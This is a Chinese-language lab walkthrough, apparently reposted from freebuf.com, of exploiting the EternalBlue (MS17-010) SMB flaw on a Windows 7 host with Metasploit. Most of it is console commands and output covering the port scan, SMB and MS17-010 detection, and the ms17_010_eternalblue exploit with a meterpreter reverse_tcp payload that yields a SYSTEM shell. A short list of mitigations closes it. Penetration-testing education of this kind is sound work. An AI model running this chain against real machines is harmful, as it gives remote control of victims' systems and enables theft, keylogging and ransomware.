“永恒之蓝”漏洞
2017 年 4 月 14 日晚,黑客团体 Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用 Windows 系统的 SMB 漏洞可以获取系统最高权限。 5 月 12 日,不法分子通过改造”永恒之蓝”制作了 wannacry 勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网呾政府机构与网中招,被勒索支付高额赎金才能解密恢复文件。
目前已知受影响的 Windows 版本包括但不限于:Windows NT,Windows 2000、 Windows XP、Windows 2003、 Windows Vista、 Windows 7、 Windows 8,Windows 2008、 Windows 2008 R2、Windows Server 2012 SP0。
本次测试环境为 Windows 7 Pro SP1
Win7 IP 192.168.1.2
Kali IP 192.168.1.8
进入 MSF 控制台,找到端口扫描模块,探测目标主机是否开启 445 (SMB) 端口
msf5 > search portscan Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 auxiliary/scanner/http/wordpress_pingback_access normal No WordPress Pingback Locator 1 auxiliary/scanner/natpmp/natpmp_portscan normal No NAT-PMP External Port Scanner 2 auxiliary/scanner/portscan/ack normal No TCP ACK Firewall Scanner 3 auxiliary/scanner/portscan/ftpbounce normal No FTP Bounce Port Scanner 4 auxiliary/scanner/portscan/syn normal No TCP SYN Port Scanner 5 auxiliary/scanner/portscan/tcp normal No TCP Port Scanner 6 auxiliary/scanner/portscan/xmas normal No TCP "XMas" Port Scanner 7 auxiliary/scanner/sap/sap_router_portscanner normal No SAPRouter Port Scanner Interact with a module by name or index, for example use 7 or use auxiliary/scanner/sap/sap_router_portscanner msf5 > use 4 msf5 auxiliary(scanner/portscan/syn) > options Module options (auxiliary/scanner/portscan/syn): Name Current Setting Required Description ---- --------------- -------- ----------- BATCHSIZE 256 yes The number of hosts to scan per set DELAY 0 yes The delay between connections, per thread, in milliseconds INTERFACE no The name of the interface JITTER 0 yes The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds. PORTS 1-10000 yes Ports to scan (e.g. 22-25,80,110-900) RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>' SNAPLEN 65535 yes The number of bytes to capture THREADS 1 yes The number of concurrent threads (max one per host) TIMEOUT 500 yes The reply read timeout in milliseconds
设置端口扫描模块,IP、端口参数
msf5 auxiliary(scanner/portscan/syn) > set rhosts 192.168.1.2 rhosts => 192.168.1.2 msf5 auxiliary(scanner/portscan/syn) > set ports 445 ports => 445 msf5 auxiliary(scanner/portscan/syn) > options Module options (auxiliary/scanner/portscan/syn): Name Current Setting Required Description ---- --------------- -------- ----------- BATCHSIZE 256 yes The number of hosts to scan per set DELAY 0 yes The delay between connections, per thread, in milliseconds INTERFACE no The name of the interface JITTER 0 yes The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds. PORTS 445 yes Ports to scan (e.g. 22-25,80,110-900) RHOSTS 192.168.1.2 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>' SNAPLEN 65535 yes The number of bytes to capture THREADS 1 yes The number of concurrent threads (max one per host) TIMEOUT 500 yes The reply read timeout in milliseconds
运行查看测试结果
msf5 > auxiliary(scanner/portscan/syn) > exploit [+] TCP OPEN 192.168.1.2:445 [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed
目标主机 445 端口开放
然后探测 445 端口是否运行 SMB 服务
msf5 > search scanner name:smb Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 auxiliary/admin/smb/check_dir_file normal No SMB Scanner Check File/Directory Utility 1 auxiliary/scanner/sap/sap_smb_relay normal No SAP SMB Relay Abuse 2 auxiliary/scanner/smb/pipe_auditor normal No SMB Session Pipe Auditor 3 auxiliary/scanner/smb/pipe_dcerpc_auditor normal No SMB Session Pipe DCERPC Auditor 4 auxiliary/scanner/smb/smb1 normal No SMBv1 Protocol Detection 5 auxiliary/scanner/smb/smb2 normal No SMB 2.0 Protocol Detection 6 auxiliary/scanner/smb/smb_enum_gpp normal No SMB Group Policy Preference Saved Passwords Enumeration 7 auxiliary/scanner/smb/smb_enumshares normal No SMB Share Enumeration 8 auxiliary/scanner/smb/smb_enumusers normal No SMB User Enumeration (SAM EnumUsers) 9 auxiliary/scanner/smb/smb_enumusers_domain normal No SMB Domain User Enumeration 10 auxiliary/scanner/smb/smb_login normal No SMB Login Check Scanner 11 auxiliary/scanner/smb/smb_lookupsid normal No SMB SID User Enumeration (LookupSid) 12 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection 13 auxiliary/scanner/smb/smb_version normal No SMB Version Detection 14 auxiliary/scanner/snmp/snmp_enumshares normal No SNMP Windows SMB Share Enumeration Interact with a module by name or index, for example use 14 or use auxiliary/scanner/snmp/snmp_enumshares msf5 > use 13 msf5 auxiliary(scanner/smb/smb_version) > options Module options (auxiliary/scanner/smb/smb_version): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>' SMBDomain . no The Windows domain to use for authentication SMBPass no The password for the specified username SMBUser no The username to authenticate as THREADS 1 yes The number of concurrent threads (max one per host)
设置 SMB 探测模块,目标主机参数
msf5 auxiliary(scanner/smb/smb_version) > set rhosts 192.168.1.2 rhosts => 192.168.1.2
运行查看效果
msf5 auxiliary(scanner/smb/smb_version) > exploit [+] 192.168.1.2:445 - Host is running Windows 7 Professional SP1 (build:7601) (name:H-PC) (workgroup:WORKGROUP ) (signatures:optional) [*] 192.168.1.2:445 - Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed
目标主机 445端口运行 SMB 服务
接下来探测目标主机是否存在”永恒之蓝”漏洞
msf5 > search auxiliary name:ms17-010 Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution 1 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection Interact with a module by name or index, for example use 1 or use auxiliary/scanner/smb/smb_ms17_010 msf5 > use 1 msf5 auxiliary(scanner/smb/smb_ms17_010) > options Module options (auxiliary/scanner/smb/smb_ms17_010): Name Current Setting Required Description ---- --------------- -------- ----------- CHECK_ARCH true no Check for architecture on vulnerable hosts CHECK_DOPU true no Check for DOUBLEPULSAR on vulnerable hosts CHECK_PIPE false no Check for named pipe on vulnerable hosts NAMED_PIPES /usr/share/metasploit-framework/data/wordlists/named_pipes.txt yes List of named pipes to check RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>' RPORT 445 yes The SMB service port (TCP) SMBDomain . no The Windows domain to use for authentication SMBPass no The password for the specified username SMBUser no The username to authenticate as THREADS 1 yes The number of concurrent threads (max one per host)
设置”永恒之蓝”探测模块,目标主机参数
msf5 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.1.2 rhosts => 192.168.1.2
运行查看探测结果
msf5 auxiliary(scanner/smb/smb_ms17_010) > exploit [+] 192.168.1.2:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit) [*] 192.168.1.2:445 - Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed
结果显示目标主机存在MS17-010″永恒之蓝”漏洞
接下来需要设置payload,验证一下是否可以获取到目标主机shell
msf5 > search exploit name:ms17-010 Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution 1 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption 2 exploit/windows/smb/ms17_010_eternalblue_win8 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+ 3 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution Interact with a module by name or index, for example use 3 or use exploit/windows/smb/ms17_010_psexec msf5 > use 1 [*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp msf5 exploit(windows/smb/ms17_010_eternalblue) > options Module options (exploit/windows/smb/ms17_010_eternalblue): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>' RPORT 445 yes The target port (TCP) SMBDomain . no (Optional) The Windows domain to use for authentication SMBPass no (Optional) The password for the specified username SMBUser no (Optional) The username to authenticate as VERIFY_ARCH true yes Check if remote architecture matches exploit Target. VERIFY_TARGET true yes Check if remote OS matches exploit Target. Payload options (windows/x64/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 192.168.1.8 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Windows 7 and Server 2008 R2 (x64) All Service Packs
我这里面得参数有之前测试设置过得痕迹,一般默认都为空
设置目标主机,也就是被测试主机
msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 192.168.1.2 rhosts => 192.168.1.2
设置payload反弹shell的接收主机,也就是测试主机,我这里是Kali(本地主机)
msf5 exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.1.8 lhost => 192.168.1.8
设置目标主机操作系统类型,这个payload的target参数选项只有一个,不用进行变动
msf5 exploit(windows/smb/ms17_010_eternalblue) > show targets Exploit targets: Id Name -- ---- 0 Windows 7 and Server 2008 R2 (x64) All Service Packs
运行查看测试结果
msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit [*] Started reverse TCP handler on 192.168.1.8:4444 [*] 192.168.1.2:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check [+] 192.168.1.2:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit) [*] 192.168.1.2:445 - Scanned 1 of 1 hosts (100% complete) [*] 192.168.1.2:445 - Connecting to target for exploitation. [+] 192.168.1.2:445 - Connection established for exploitation. [+] 192.168.1.2:445 - Target OS selected valid for OS indicated by SMB reply [*] 192.168.1.2:445 - CORE raw buffer dump (42 bytes) [*] 192.168.1.2:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes [*] 192.168.1.2:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv [*] 192.168.1.2:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1 [+] 192.168.1.2:445 - Target arch selected valid for arch indicated by DCE/RPC reply [*] 192.168.1.2:445 - Trying exploit with 12 Groom Allocations. [*] 192.168.1.2:445 - Sending all but last fragment of exploit packet [*] 192.168.1.2:445 - Starting non-paged pool grooming [+] 192.168.1.2:445 - Sending SMBv2 buffers [+] 192.168.1.2:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer. [*] 192.168.1.2:445 - Sending final SMBv2 buffers. [*] 192.168.1.2:445 - Sending last fragment of exploit packet! [*] 192.168.1.2:445 - Receiving response from exploit packet [+] 192.168.1.2:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)! [*] 192.168.1.2:445 - Sending egg to corrupted connection. [*] 192.168.1.2:445 - Triggering free of corrupted buffer. [*] Sending stage (201283 bytes) to 192.168.1.2 [*] Meterpreter session 1 opened (192.168.1.8:4444 -> 192.168.1.2:49214) at 2020-07-23 10:32:15 +0800 [+] 192.168.1.2:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [+] 192.168.1.2:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [+] 192.168.1.2:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= meterpreter > pwd C:\Windows\system32
获取到目标主机shell,system权限,此权限危害较高,可以窃取用户键盘记录、实时屏幕、关闭/添加进程等操作。
“永恒之蓝”应对方法
1.升级微软补丁MS17-010
2.Windows7、Windows8、Windows10电脑启用Windows防火墙添加策略关闭135、137、138、139、445端口
3.(若有杀软)升级杀毒软件最新版本
来源:freebuf.com 2020-07-24 10:03:26 by: LXNSEC
请登录后发表评论
注册